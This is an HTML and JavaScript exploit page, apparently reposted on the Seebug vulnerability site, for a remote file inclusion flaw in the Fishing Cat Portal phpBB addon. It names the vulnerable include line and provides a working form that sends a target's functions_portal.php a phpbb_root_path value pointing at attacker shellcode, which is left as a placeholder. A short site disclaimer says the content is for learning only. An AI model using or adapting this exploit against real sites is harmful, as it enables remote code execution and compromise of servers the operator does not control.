<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //'Bug found and Exploit coded by bd0rk //'Vendor: http://www.foxymods-phpbb.com/ //'Download: http://www.foxymods-phpbb.com/download.php?id=7 //'Contact: bd0rk[at]hackermail.com //'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx); //'$phpbb_root_path is not declared before include //'Greetings: str0ke, TheJT, rgod, Frauenarzt //#The german Hacker bd0rk var dir="/includes/" var file="/functions_portal.php?" var parameter ="phpbb_root_path=" var shell="Insert your shellcode here" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论